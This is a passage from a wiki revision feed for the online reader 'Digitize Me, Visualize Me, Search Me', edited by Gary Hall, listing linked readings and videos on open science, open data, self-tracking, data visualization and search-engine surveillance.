;Anne H. Margulies&amp;amp;nbsp; &lt;br /&gt;
:[http://www.plosbiology.org/article/info%3Adoi%2F10.1371%2Fjournal.pbio.0020200 A New Model for Open Sharing]&lt;br /&gt;
&lt;br /&gt;
;Thomas B. Kepler, Marc A. Marti-Renom, Stephen M. Maurer, Arti K. Rai, Ginger Taylor, Matthew H. Todd&amp;amp;nbsp; &lt;br /&gt;
:[http://www.publish.csiro.au/nid/51/paper/CH06095.htm Open Source Research - The Power of Us]&lt;br /&gt;
&lt;br /&gt;
=== Open Knowledge and its Discontents  ===&lt;br /&gt;
&lt;br /&gt;
;J.J. King&amp;amp;nbsp; &lt;br /&gt;
:[http://www.metamute.org/proudtobeflesh The Packet Gang: Openness and its Discontents]&lt;br /&gt;
&lt;br /&gt;
;Michael Gurstein&amp;amp;nbsp; &lt;br /&gt;
:[http://gurstein.wordpress.com/2011/07/03/are-the-open-data-warriors-fighting-for-robin-hood-or-the-sheriff-some-reflections-on-okcon-2011-and-the-emerging-data-divide/ Are the Open Data Warriors Fighting for Robin Hood or the Sheriff?: Some Reflections on OKCon 2011 and the Emerging Data Divide]&lt;br /&gt;
&lt;br /&gt;
== Open Data  ==&lt;br /&gt;
&lt;br /&gt;
=== Data-Intensive Science  ===&lt;br /&gt;
&lt;br /&gt;
;Vincent S. Smith&amp;amp;nbsp; &lt;br /&gt;
:[http://www.biomedcentral.com/1756-0500/2/113 Data Publication: Towards a Database of Everything]&lt;br /&gt;
&lt;br /&gt;
;Tony Hey, Stewart Tansley, Kristen Tolle, eds&amp;amp;nbsp; &lt;br /&gt;
:[http://research.microsoft.com/en-us/collaboration/fourthparadigm/4th_paradigm_book_part4_complete.pdf Scholarly Communication, ''The Fourth Paradigm: Data-Intensive Scientific Discovery'']&lt;br /&gt;
&lt;br /&gt;
=== World of Data  ===&lt;br /&gt;
&lt;br /&gt;
;[http://www.freeourdata.org.uk/ Free Our Data]&lt;br /&gt;
&lt;br /&gt;
;Simon Rogers&amp;amp;nbsp; &lt;br /&gt;
:[http://www.guardian.co.uk/news/datablog/2010/nov/09/canada-open-data How Canada Became an Open Data and Data Journalism Powerhouse]&lt;br /&gt;
&lt;br /&gt;
=== We Can Know It For You  ===&lt;br /&gt;
&lt;br /&gt;
;Omer Tene&amp;amp;nbsp; &lt;br /&gt;
:[http://epubs.utah.edu/index.php/ulr/article/viewArticle/136 What Google Knows: Privacy and Internet Search Engines]&lt;br /&gt;
&lt;br /&gt;
;Daniel Chandramohan, Kenji Shibuya, Philip Setel, Sandy Cairncross, Alan D. Lopez, Christopher J. L. Murray, Basia Żaba, Robert W. Snow, Fred Binka&amp;amp;nbsp; &lt;br /&gt;
:[http://www.plosmedicine.org/article/info%3Adoi%2F10.1371%2Fjournal.pmed.0050057 Should Data from Demographic Surveillance Systems Be Made More Widely Available to Researchers?]&lt;br /&gt;
&lt;br /&gt;
== '''Digitize Me'''  ==&lt;br /&gt;
&lt;br /&gt;
=== Encode Me/Decode Me  ===&lt;br /&gt;
&lt;br /&gt;
;[http://www.ornl.gov/sci/techresources/Human_Genome/home.shtml Human Genome Project]&lt;br /&gt;
&lt;br /&gt;
;The ENCODE Project Consortium&amp;amp;nbsp; &lt;br /&gt;
:[http://pubmedcentralcanada.ca/picrender.cgi?accid=PMC3079585&amp;amp;blobtype=pdf&amp;amp;tool=pmcentrez A User's Guide to the Encyclopaedia of DNA Elements (ENCODE) ]&lt;br /&gt;
&lt;br /&gt;
;[http://www.decodeme.com/about-decodeme deCODEme]&lt;br /&gt;
&lt;br /&gt;
=== Life-Tracking  ===&lt;br /&gt;
&lt;br /&gt;
{{#widget:Vimeo|id=27381297}} &lt;br /&gt;
&lt;br /&gt;
;[http://quantifiedself.com Quantified Self]&lt;br /&gt;
&lt;br /&gt;
;Gary Wolf&amp;amp;nbsp; &lt;br /&gt;
:[http://xrl.us/bh3d4g The Data-Driven Life]&lt;br /&gt;
&lt;br /&gt;
;Aiden R. Doherty and Alan F. Smeaton&amp;amp;nbsp; &lt;br /&gt;
:[http://doras.dcu.ie/15300/1/Sensors-03-154-Doherty-ie-edited.pdf Automatically Augmenting Lifelog Events Using Pervasively Generated Content from Millions of People]&lt;br /&gt;
&lt;br /&gt;
;Jennifer S. Beaudin, Stephen S. Intille, and Margaret E. Morris&amp;amp;nbsp; &lt;br /&gt;
:[http://www.ncbi.nlm.nih.gov/pmc/articles/PMC1794006/?tool=pmcentrez#ref1 To Track or Not to Track: User Reactions to Concepts in Longitudinal Health Monitoring]&lt;br /&gt;
&lt;br /&gt;
=== The Neurological Turn: or, ‘How the Internet Gets Inside Us'  ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;youtube&amp;gt;NhLnoZFCDBM&amp;lt;/youtube&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
;Adam Gopnik&amp;amp;nbsp; &lt;br /&gt;
:[http://www.newyorker.com/arts/critics/atlarge/2011/02/14/110214crat_atlarge_gopnik The Information: How the Internet Gets Inside Us]&lt;br /&gt;
&lt;br /&gt;
;N. Katherine Hayles&amp;amp;nbsp; &lt;br /&gt;
:[http://www.sciy.org/2010/11/24/hyper-and-deep-attention-the-generational-divide-in-cognitive-modes-by-n-katherine-hayles/ Hyper and Deep Attention: The Generation Divide in Cognitive Modes]&lt;br /&gt;
&lt;br /&gt;
;Anna Munster&amp;amp;nbsp; &lt;br /&gt;
:[http://computationalculture.net/article/nerves-of-data Nerves of Data: The Neuological Turn In/Against Networked Media]&lt;br /&gt;
&lt;br /&gt;
== '''Visualize Me'''  ==&lt;br /&gt;
&lt;br /&gt;
=== What is Visualization?  ===&lt;br /&gt;
&lt;br /&gt;
;Lev Manovich&amp;amp;nbsp; &lt;br /&gt;
:[http://manovich.net/blog/wp-content/uploads/2010/10/manovich_visualization_2010.doc What is Visualization?]&lt;br /&gt;
&lt;br /&gt;
;Nathan Yau&amp;amp;nbsp; &lt;br /&gt;
:[http://flowingdata.com/2011/02/23/data-visualization-meets-game-design-to-explore-your-digital-life/ Data Visualization Meets Game Design to Explore your Digital Life]&lt;br /&gt;
&lt;br /&gt;
;[http://bloom.io/ Bloom]&lt;br /&gt;
&lt;br /&gt;
{{#widget:Vimeo|id=8569187}} &lt;br /&gt;
&lt;br /&gt;
;Keiichi Matsuda &lt;br /&gt;
:[http://www.keiichimatsuda.com/augmented.php Augmented (hyper)Reality: Domestic Robocop]&lt;br /&gt;
&lt;br /&gt;
=== Mood-mapping  ===&lt;br /&gt;
&lt;br /&gt;
;Celeste Biever&amp;amp;nbsp; &lt;br /&gt;
:[http://www.newscientist.com/article/dn19200-twitter-mood-maps-reveal-emotional-states-of-america.html Twitter Mood Maps Reveal Emotional States of America]&lt;br /&gt;
&lt;br /&gt;
;[http://www.newscientist.com/articlevideo/dn19200/221111468001-twitter-mood-maps-reveal-emotional-states-of-america.html Twitter mood video]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;youtube&amp;gt;ZglPWYb8X2o&amp;lt;/youtube&amp;gt; [http://www.moodscope.com/] &lt;br /&gt;
&lt;br /&gt;
;[http://www.moodscope.com/ Moodscope]&lt;br /&gt;
&lt;br /&gt;
;[http://www.mappiness.org.uk Mappiness]&lt;br /&gt;
&lt;br /&gt;
=== The Visualized Human (or, The Human As Spectacle)  ===&lt;br /&gt;
&lt;br /&gt;
;Nicholas Felton&amp;amp;nbsp; &lt;br /&gt;
:[http://feltron.com/ The Annual Felton Report]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;youtube&amp;gt;RE4ce4mexrU&amp;lt;/youtube&amp;gt; &lt;br /&gt;
&lt;br /&gt;
;Deb Roy&amp;amp;nbsp; &lt;br /&gt;
:[http://www.youtube.com/watch?v=RE4ce4mexrU&amp;amp;feature=youtu.be The Birth of a Word]&lt;br /&gt;
&lt;br /&gt;
;Johanna Drucker&amp;amp;nbsp; &lt;br /&gt;
:[http://mit.tv/y7OwFq Humanistic Approaches to the Graphical Expression of Interpretation]&lt;br /&gt;
&lt;br /&gt;
== Search Me  ==&lt;br /&gt;
&lt;br /&gt;
=== Search-Engine Science  ===&lt;br /&gt;
&lt;br /&gt;
;Emily H. Chan, Vikram Sahai, Corrie Conrad, and John S. Brownstein&amp;amp;nbsp; &lt;br /&gt;
:[http://pubmedcentralcanada.ca/articlerender.cgi?accid=PMC3104029&amp;amp;tool=pmcentrez Using Web Search Query Data to Monitor Dengue Epidemics: A New Model for Neglected Tropical Disease Surveillance]&lt;br /&gt;
&lt;br /&gt;
;Annie Y.S. Lau, Enrico Coiera, Tatjana Zrimec, and Paul Compton&amp;amp;nbsp; &lt;br /&gt;
:[http://pubmedcentralcanada.ca/articlerender.cgi?accid=PMC2956236&amp;amp;tool=pmcentrez Clinician Search Behaviors May Be Influenced by Search Engine Design]&lt;br /&gt;
&lt;br /&gt;
:[https://brandyourself.com/ BrandYourself]&lt;br /&gt;
&lt;br /&gt;
=== The Science of Control  ===&lt;br /&gt;
&lt;br /&gt;
;Alession Signorini, Alberto Maria Segre, Philip M. Polgreen&amp;amp;nbsp; &lt;br /&gt;
:[http://www.plosone.org/article/info%3Adoi%2F10.1371%2Fjournal.pone.0019467 The Use of Twitter to Track Levels of Disease Activity and Public Concern in the U.S. During the Influenza A H1N1 Pandemic]&lt;br /&gt;
&lt;br /&gt;
;David Parry&amp;amp;nbsp; &lt;br /&gt;
:[http://www.livingbooksaboutlife.org/books/Surveillance ''Surveillance'' ]&lt;br /&gt;
&lt;br /&gt;
;Felix Stalder and Christine Mayer&amp;amp;nbsp; &lt;br /&gt;
:[http://felix.openflows.com/node/113 The Second Index: Search Engines, Personalization and Surveillance (Deep Search)]&lt;br /&gt;
&lt;br /&gt;
=== Deep Search  ===&lt;br /&gt;
&lt;br /&gt;
{{#widget:Vimeo|id=13456992}} &lt;br /&gt;
&lt;br /&gt;
;Michael K. Bergman&amp;amp;nbsp; &lt;br /&gt;
:[http://quod.lib.umich.edu/cgi/t/text/text-idx?c=jep;view=text;rgn=main;idno=3336451.0007.104 The Deep Web: Surfacing Hidden Value]&lt;br /&gt;
&lt;br /&gt;
;Clare Birchall&amp;amp;nbsp; &lt;br /&gt;
:[http://www.livingbooksaboutlife.org/books/The_in/visible The Invisible Web, ''The In/Visible'']&lt;br /&gt;
&lt;br /&gt;
== Media Gifts?  ==&lt;br /&gt;
&lt;br /&gt;
{{#widget:Vimeo|id=8223187}} [http://www.suicidemachine.org/] &lt;br /&gt;
&lt;br /&gt;
;[http://www.suicidemachine.org/ Web 2.0 Suicide Machine]&lt;br /&gt;
&lt;br /&gt;
;[http://transparencygrenade.com/ Transparency Grenade]&lt;br /&gt;
&lt;br /&gt;
;[http://www.freedomboxfoundation.org/ Freedom Box Foundation]&lt;br /&gt;
&lt;br /&gt;
;[http://yacy.net/en/index.html/ YaCy]&lt;br /&gt;
&lt;br /&gt;
;[http://navasse.net/traceblog/about.html Traceblog]&lt;br /&gt;
&lt;br /&gt;
;[http://turbulence.org/Works/JJPS/extension The JJPS Firefox Extension]&lt;br /&gt;
&lt;br /&gt;
;[http://www.weavrs.com/find/ Weavers]&lt;br /&gt;
&lt;br /&gt;
;[http://bengrosser.com/projects/facebook-demetricator/ Facebook Demetricator]&lt;br /&gt;
&lt;br /&gt;
;[http://prisom.me/ #PRISOM]&lt;br /&gt;
&lt;br /&gt;
;[http://givememydata.com/ Give Me My Data]&lt;br /&gt;
&lt;br /&gt;
;[http://commodify.us/ commodify.us]&lt;br /&gt;
&lt;br /&gt;
== Appendix  ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;youtube&amp;gt;ukNkx45Ua0Y&amp;lt;/youtube&amp;gt; &lt;br /&gt;
&lt;br /&gt;
;Karl Popper, The Open Society and its Enemies&lt;br /&gt;
&lt;br /&gt;
== [http://www.livingbooksaboutlife.org/books/Open_science/Attributions Attributions]  ==&lt;br /&gt;
&lt;br /&gt;
== A 'Frozen' PDF Version of this Living Book  ==&lt;br /&gt;
&lt;br /&gt;
;[http://livingbooksaboutlife.org/pdfs/bookarchive/DigitizeMe.pdf Download a 'frozen' PDF version of this book as it appeared on 7th October 2011]&lt;/div&gt;</summary>
		<author><name>Garyhall</name></author>
	</entry>
	<entry>
		<id>https://livingbooksaboutlife.org/wiki/index.php?title=Digitize_Me,_Visualize_Me,_Search_Me&amp;diff=5505</id>
		<title>Digitize Me, Visualize Me, Search Me</title>
		<link rel="alternate" type="text/html" href="https://livingbooksaboutlife.org/wiki/index.php?title=Digitize_Me,_Visualize_Me,_Search_Me&amp;diff=5505"/>
		<updated>2013-11-12T08:56:16Z</updated>

		<summary type="html">&lt;p&gt;Garyhall: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[Image:LifetrackingCover1.jpg|right|318x450px|LifetrackingCover1.jpg]] Open Science and its Discontents &lt;br /&gt;
&lt;br /&gt;
[http://www.livingbooksaboutlife.org/books/ISBN_Numbers ISBN: 978-1-60785-267-4] &lt;br /&gt;
&lt;br /&gt;
''edited by'' [http://www.livingbooksaboutlife.org/books/Digitize_Me,_Visualize_Me,_Search_Me/bio Gary Hall] __TOC__ &lt;br /&gt;
&lt;br /&gt;
== [http://www.livingbooksaboutlife.org/books/Open_science/Introduction '''Introduction: White Noise: On the Limits of Openness (Living Book Mix)''']  ==&lt;br /&gt;
&lt;br /&gt;
One of the aims of the Living Books About Life series is to provide a 'bridge' or point of connection, translation, even interrogation and contestation, between the humanities and the sciences. Accordingly, this introduction to ''Digitize Me, Visualize Me, Search Me'' takes as its starting point the so-called ‘computational turn’ to data-intensive scholarship in the humanities. &lt;br /&gt;
&lt;br /&gt;
The phrase ‘[http://www.thecomputationalturn.com/ the computational turn]’ has been adopted to refer to the process whereby techniques and methodologies drawn from computer science and related fields – including science visualization, interactive information visualization, image processing, network analysis, statistical data analysis, and the management, manipulation and mining of data – are being increasingly used to produce new ways of approaching and understanding texts in the humanities - what is sometimes thought of as 'the digital humanities'. [http://www.livingbooksaboutlife.org/books/Open_science/Introduction (more...)] &lt;br /&gt;
&lt;br /&gt;
== Open Science  ==&lt;br /&gt;
&lt;br /&gt;
=== It’s An Open (Science), Open (Access), Open (Source), Open (Notebook) World  ===&lt;br /&gt;
&lt;br /&gt;
;[http://usefulchem.wikispaces.com/ Open Notebook Science ]&lt;br /&gt;
&lt;br /&gt;
;Patrick O. Brown, Michael B. Eisen, Harold Varmus&amp;amp;nbsp; &lt;br /&gt;
:[http://www.plosbiology.org/article/info%3Adoi%2F10.1371%2Fjournal.pbio.0000036 Why PLoS Became a Publisher]&lt;br /&gt;
&lt;br /&gt;
;Sally Murray, Stephen Choi, John Hoey, Claire Kendall, James Maskalyk, and Anita Palepu&amp;amp;nbsp; &lt;br /&gt;
:[http://www.ncbi.nlm.nih.gov/pmc/articles/PMC3091592/pdf/OpenMed-02-e1.pdf??tool=pmcentrez Open Science, Open Access and Open Source Software at ''Open Medicine'']&lt;br /&gt;
&lt;br /&gt;
=== Community Science  ===&lt;br /&gt;
&lt;br /&gt;
{{#widget:Vimeo|id=12873908}} &lt;br /&gt;
&lt;br /&gt;
;[http://www.psfk.com/2010/09/biocurious-a-community-lab-for-biotechnology.html BioCurious: A Community Lab for Biotechnology]&lt;br /&gt;
&lt;br /&gt;
;Richard Stallman&amp;amp;nbsp; &lt;br /&gt;
:[http://www.plosmedicine.org/article/info%3Adoi%2F10.1371%2Fjournal.pmed.0020047 Free Community Science and the Free Development of Science]&lt;br /&gt;
&lt;br /&gt;
=== 'This Revolution Will Be Digitized’: Online Tools for Open Science  ===&lt;br /&gt;
&lt;br /&gt;
;[http://biogang.openwetware.org/ Biogang]&lt;br /&gt;
&lt;br /&gt;
;Bill Hooker&amp;amp;nbsp; &lt;br /&gt;
:[http://3quarksdaily.blogs.com/3quarksdaily/2007/01/the_future_of_s.html The Future of Science is Open, Part 3: An Open Science World]&lt;br /&gt;
&lt;br /&gt;
;Chris Patil and Vivian Siegel&amp;amp;nbsp; &lt;br /&gt;
:[http://www.ncbi.nlm.nih.gov/pmc/articles/PMC2675795/ This Revolution Will Be Digitized: Online Tools for Radical Collaboration]&lt;br /&gt;
&lt;br /&gt;
=== Open Science Publishing  ===&lt;br /&gt;
&lt;br /&gt;
;Philip E. Bourne&amp;amp;nbsp; &lt;br /&gt;
:[http://www.ncbi.nlm.nih.gov/pmc/articles/PMC2877727/?tool=pmcentrez#pcbi.1000787-Hey1 What Do I Want from the Publisher of the Future?]&lt;br /&gt;
&lt;br /&gt;
;Cameron Neylon&amp;amp;nbsp; &lt;br /&gt;
:[http://pirsa.org/08090038/ Science in the Open/or/How I Learned to Stop Worrying and Love My Blog]&lt;br /&gt;
&lt;br /&gt;
== Open Knowledge  ==&lt;br /&gt;
&lt;br /&gt;
=== Access to Knowledge  ===&lt;br /&gt;
&lt;br /&gt;
;[http://okfn.org/ Open Knowledge Foundation]&lt;br /&gt;
&lt;br /&gt;
;Gaelle Krikorian and Amy Kapczynski, eds&amp;amp;nbsp; &lt;br /&gt;
:[http://www.soros.org/initiatives/information/focus/access/articles_publications/publications/age-of-intellectual-property-20101110/age-of-intellectual-property-20101110.pdf ''Access to Knowledge In the Age of Intellectual Property'']&lt;br /&gt;
&lt;br /&gt;
=== New Models for Open Sharing and Open Research  ===&lt;br /&gt;
&lt;br /&gt;
;Anne H. Margulies&amp;amp;nbsp; &lt;br /&gt;
:[http://www.plosbiology.org/article/info%3Adoi%2F10.1371%2Fjournal.pbio.0020200 A New Model for Open Sharing]&lt;br /&gt;
&lt;br /&gt;
;Thomas B. Kepler, Marc A. Marti-Renom, Stephen M. Maurer, Arti K. Rai, Ginger Taylor, Matthew H. Todd&amp;amp;nbsp; &lt;br /&gt;
:[http://www.publish.csiro.au/nid/51/paper/CH06095.htm Open Source Research - The Power of Us]&lt;br /&gt;
&lt;br /&gt;
=== Open Knowledge and its Discontents  ===&lt;br /&gt;
&lt;br /&gt;
;J.J. King&amp;amp;nbsp; &lt;br /&gt;
:[http://www.metamute.org/proudtobeflesh The Packet Gang: Openness and its Discontents]&lt;br /&gt;
&lt;br /&gt;
;Michael Gurstein&amp;amp;nbsp; &lt;br /&gt;
:[http://gurstein.wordpress.com/2011/07/03/are-the-open-data-warriors-fighting-for-robin-hood-or-the-sheriff-some-reflections-on-okcon-2011-and-the-emerging-data-divide/ Are the Open Data Warriors Fighting for Robin Hood or the Sheriff?: Some Reflections on OKCon 2011 and the Emerging Data Divide]&lt;br /&gt;
&lt;br /&gt;
== Open Data  ==&lt;br /&gt;
&lt;br /&gt;
=== Data-Intensive Science  ===&lt;br /&gt;
&lt;br /&gt;
;Vincent S. Smith&amp;amp;nbsp; &lt;br /&gt;
:[http://www.biomedcentral.com/1756-0500/2/113 Data Publication: Towards a Database of Everything]&lt;br /&gt;
&lt;br /&gt;
;Tony Hey, Stewart Tansley, Kristen Tolle, eds&amp;amp;nbsp; &lt;br /&gt;
:[http://research.microsoft.com/en-us/collaboration/fourthparadigm/4th_paradigm_book_part4_complete.pdf Scholarly Communication, ''The Fourth Paradigm: Data-Intensive Scientific Discovery'']&lt;br /&gt;
&lt;br /&gt;
=== World of Data  ===&lt;br /&gt;
&lt;br /&gt;
;[http://www.freeourdata.org.uk/ Free Our Data]&lt;br /&gt;
&lt;br /&gt;
;Simon Rogers&amp;amp;nbsp; &lt;br /&gt;
:[http://www.guardian.co.uk/news/datablog/2010/nov/09/canada-open-data How Canada Became an Open Data and Data Journalism Powerhouse]&lt;br /&gt;
&lt;br /&gt;
=== We Can Know It For You  ===&lt;br /&gt;
&lt;br /&gt;
;Omer Tene&amp;amp;nbsp; &lt;br /&gt;
:[http://epubs.utah.edu/index.php/ulr/article/viewArticle/136 What Google Knows: Privacy and Internet Search Engines]&lt;br /&gt;
&lt;br /&gt;
;Daniel Chandramohan, Kenji Shibuya, Philip Setel, Sandy Cairncross, Alan D. Lopez, Christopher J. L. Murray, Basia Żaba, Robert W. Snow, Fred Binka&amp;amp;nbsp; &lt;br /&gt;
:[http://www.plosmedicine.org/article/info%3Adoi%2F10.1371%2Fjournal.pmed.0050057 Should Data from Demographic Surveillance Systems Be Made More Widely Available to Researchers?]&lt;br /&gt;
&lt;br /&gt;
== '''Digitize Me'''  ==&lt;br /&gt;
&lt;br /&gt;
=== Encode Me/Decode Me  ===&lt;br /&gt;
&lt;br /&gt;
;[http://www.ornl.gov/sci/techresources/Human_Genome/home.shtml Human Genome Project]&lt;br /&gt;
&lt;br /&gt;
;The ENCODE Project Consortium&amp;amp;nbsp; &lt;br /&gt;
:[http://pubmedcentralcanada.ca/picrender.cgi?accid=PMC3079585&amp;amp;blobtype=pdf&amp;amp;tool=pmcentrez A User's Guide to the Encyclopaedia of DNA Elements (ENCODE) ]&lt;br /&gt;
&lt;br /&gt;
;[http://www.decodeme.com/about-decodeme deCODEme]&lt;br /&gt;
&lt;br /&gt;
=== Life-Tracking  ===&lt;br /&gt;
&lt;br /&gt;
{{#widget:Vimeo|id=27381297}} &lt;br /&gt;
&lt;br /&gt;
;[http://quantifiedself.com Quantified Self]&lt;br /&gt;
&lt;br /&gt;
;Gary Wolf&amp;amp;nbsp; &lt;br /&gt;
:[http://xrl.us/bh3d4g The Data-Driven Life]&lt;br /&gt;
&lt;br /&gt;
;Aiden R. Doherty and Alan F. Smeaton&amp;amp;nbsp; &lt;br /&gt;
:[http://doras.dcu.ie/15300/1/Sensors-03-154-Doherty-ie-edited.pdf Automatically Augmenting Lifelog Events Using Pervasively Generated Content from Millions of People]&lt;br /&gt;
&lt;br /&gt;
;Jennifer S. Beaudin, Stephen S. Intille, and Margaret E. Morris&amp;amp;nbsp; &lt;br /&gt;
:[http://www.ncbi.nlm.nih.gov/pmc/articles/PMC1794006/?tool=pmcentrez#ref1 To Track or Not to Track: User Reactions to Concepts in Longitudinal Health Monitoring]&lt;br /&gt;
&lt;br /&gt;
=== The Neurological Turn: or, ‘How the Internet Gets Inside Us'  ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;youtube&amp;gt;NhLnoZFCDBM&amp;lt;/youtube&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
;Adam Gopnik&amp;amp;nbsp; &lt;br /&gt;
:[http://www.newyorker.com/arts/critics/atlarge/2011/02/14/110214crat_atlarge_gopnik The Information: How the Internet Gets Inside Us]&lt;br /&gt;
&lt;br /&gt;
;N. Katherine Hayles&amp;amp;nbsp; &lt;br /&gt;
:[http://www.sciy.org/2010/11/24/hyper-and-deep-attention-the-generational-divide-in-cognitive-modes-by-n-katherine-hayles/ Hyper and Deep Attention: The Generation Divide in Cognitive Modes]&lt;br /&gt;
&lt;br /&gt;
;Anna Munster&amp;amp;nbsp; &lt;br /&gt;
:[http://computationalculture.net/article/nerves-of-data Nerves of Data: The Neuological Turn In/Against Networked Media]&lt;br /&gt;
&lt;br /&gt;
== '''Visualize Me'''  ==&lt;br /&gt;
&lt;br /&gt;
=== What is Visualization?  ===&lt;br /&gt;
&lt;br /&gt;
;Lev Manovich&amp;amp;nbsp; &lt;br /&gt;
:[http://manovich.net/blog/wp-content/uploads/2010/10/manovich_visualization_2010.doc What is Visualization?]&lt;br /&gt;
&lt;br /&gt;
;Nathan Yau&amp;amp;nbsp; &lt;br /&gt;
:[http://flowingdata.com/2011/02/23/data-visualization-meets-game-design-to-explore-your-digital-life/ Data Visualization Meets Game Design to Explore your Digital Life]&lt;br /&gt;
&lt;br /&gt;
;[http://bloom.io/ Bloom]&lt;br /&gt;
&lt;br /&gt;
{{#widget:Vimeo|id=8569187}} &lt;br /&gt;
&lt;br /&gt;
;Keiichi Matsuda &lt;br /&gt;
:[http://www.keiichimatsuda.com/augmented.php Augmented (hyper)Reality: Domestic Robocop]&lt;br /&gt;
&lt;br /&gt;
=== Mood-mapping  ===&lt;br /&gt;
&lt;br /&gt;
;Celeste Biever&amp;amp;nbsp; &lt;br /&gt;
:[http://www.newscientist.com/article/dn19200-twitter-mood-maps-reveal-emotional-states-of-america.html Twitter Mood Maps Reveal Emotional States of America]&lt;br /&gt;
&lt;br /&gt;
;[http://www.newscientist.com/articlevideo/dn19200/221111468001-twitter-mood-maps-reveal-emotional-states-of-america.html Twitter mood video]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;youtube&amp;gt;ZglPWYb8X2o&amp;lt;/youtube&amp;gt; [http://www.moodscope.com/] &lt;br /&gt;
&lt;br /&gt;
;[http://www.moodscope.com/ Moodscope]&lt;br /&gt;
&lt;br /&gt;
;[http://www.mappiness.org.uk Mappiness]&lt;br /&gt;
&lt;br /&gt;
=== The Visualized Human (or, The Human As Spectacle)  ===&lt;br /&gt;
&lt;br /&gt;
;Nicholas Felton&amp;amp;nbsp; &lt;br /&gt;
:[http://feltron.com/ The Annual Felton Report]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;youtube&amp;gt;RE4ce4mexrU&amp;lt;/youtube&amp;gt; &lt;br /&gt;
&lt;br /&gt;
;Deb Roy&amp;amp;nbsp; &lt;br /&gt;
:[http://www.youtube.com/watch?v=RE4ce4mexrU&amp;amp;feature=youtu.be The Birth of a Word]&lt;br /&gt;
&lt;br /&gt;
;Johanna Drucker&amp;amp;nbsp; &lt;br /&gt;
:[http://mit.tv/y7OwFq Humanistic Approaches to the Graphical Expression of Interpretation]&lt;br /&gt;
&lt;br /&gt;
== Search Me  ==&lt;br /&gt;
&lt;br /&gt;
=== Search-Engine Science  ===&lt;br /&gt;
&lt;br /&gt;
;Emily H. Chan, Vikram Sahai, Corrie Conrad, and John S. Brownstein&amp;amp;nbsp; &lt;br /&gt;
:[http://pubmedcentralcanada.ca/articlerender.cgi?accid=PMC3104029&amp;amp;tool=pmcentrez Using Web Search Query Data to Monitor Dengue Epidemics: A New Model for Neglected Tropical Disease Surveillance]&lt;br /&gt;
&lt;br /&gt;
;Annie Y.S. Lau, Enrico Coiera, Tatjana Zrimec, and Paul Compton&amp;amp;nbsp; &lt;br /&gt;
:[http://pubmedcentralcanada.ca/articlerender.cgi?accid=PMC2956236&amp;amp;tool=pmcentrez Clinician Search Behaviors May Be Influenced by Search Engine Design]&lt;br /&gt;
&lt;br /&gt;
:[https://brandyourself.com/ BrandYourself]&lt;br /&gt;
&lt;br /&gt;
=== The Science of Control  ===&lt;br /&gt;
&lt;br /&gt;
;Alession Signorini, Alberto Maria Segre, Philip M. Polgreen&amp;amp;nbsp; &lt;br /&gt;
:[http://www.plosone.org/article/info%3Adoi%2F10.1371%2Fjournal.pone.0019467 The Use of Twitter to Track Levels of Disease Activity and Public Concern in the U.S. During the Influenza A H1N1 Pandemic]&lt;br /&gt;
&lt;br /&gt;
;David Parry&amp;amp;nbsp; &lt;br /&gt;
:[http://www.livingbooksaboutlife.org/books/Surveillance ''Surveillance'' ]&lt;br /&gt;
&lt;br /&gt;
;Felix Stalder and Christine Mayer&amp;amp;nbsp; &lt;br /&gt;
:[http://felix.openflows.com/node/113 The Second Index: Search Engines, Personalization and Surveillance (Deep Search)]&lt;br /&gt;
&lt;br /&gt;
=== Deep Search  ===&lt;br /&gt;
&lt;br /&gt;
{{#widget:Vimeo|id=13456992}} &lt;br /&gt;
&lt;br /&gt;
;Michael K. Bergman&amp;amp;nbsp; &lt;br /&gt;
:[http://quod.lib.umich.edu/cgi/t/text/text-idx?c=jep;view=text;rgn=main;idno=3336451.0007.104 The Deep Web: Surfacing Hidden Value]&lt;br /&gt;
&lt;br /&gt;
;Clare Birchall&amp;amp;nbsp; &lt;br /&gt;
:[http://www.livingbooksaboutlife.org/books/The_in/visible The Invisible Web, ''The In/Visible'']&lt;br /&gt;
&lt;br /&gt;
== Media Gifts?  ==&lt;br /&gt;
&lt;br /&gt;
{{#widget:Vimeo|id=8223187}} [http://www.suicidemachine.org/] &lt;br /&gt;
&lt;br /&gt;
;[http://www.suicidemachine.org/ Web 2.0 Suicide Machine]&lt;br /&gt;
&lt;br /&gt;
;[http://transparencygrenade.com/ Transparency Grenade]&lt;br /&gt;
&lt;br /&gt;
;[http://www.freedomboxfoundation.org/ Freedom Box Foundation]&lt;br /&gt;
&lt;br /&gt;
;[http://yacy.net/en/index.html/ YaCy]&lt;br /&gt;
&lt;br /&gt;
;[http://navasse.net/traceblog/about.html Traceblog]&lt;br /&gt;
&lt;br /&gt;
;[http://turbulence.org/Works/JJPS/extension The JJPS Firefox Extension]&lt;br /&gt;
&lt;br /&gt;
;[http://www.weavrs.com/find/ Weavers]&lt;br /&gt;
&lt;br /&gt;
;[http://bengrosser.com/projects/facebook-demetricator/ Facebook Demetricator]&lt;br /&gt;
&lt;br /&gt;
;[http://prisom.me/ #PRISOM]&lt;br /&gt;
&lt;br /&gt;
;[http://givememydata.com/ Give Me My Data]&lt;br /&gt;
&lt;br /&gt;
;[http://commodify.us/ commodify.us]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Appendix  ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;youtube&amp;gt;ukNkx45Ua0Y&amp;lt;/youtube&amp;gt; &lt;br /&gt;
&lt;br /&gt;
;Karl Popper, The Open Society and its Enemies&lt;br /&gt;
&lt;br /&gt;
== [http://www.livingbooksaboutlife.org/books/Open_science/Attributions Attributions]  ==&lt;br /&gt;
&lt;br /&gt;
== A 'Frozen' PDF Version of this Living Book  ==&lt;br /&gt;
&lt;br /&gt;
;[http://livingbooksaboutlife.org/pdfs/bookarchive/DigitizeMe.pdf Download a 'frozen' PDF version of this book as it appeared on 7th October 2011]&lt;/div&gt;</summary>
		<author><name>Garyhall</name></author>
	</entry>
	<entry>
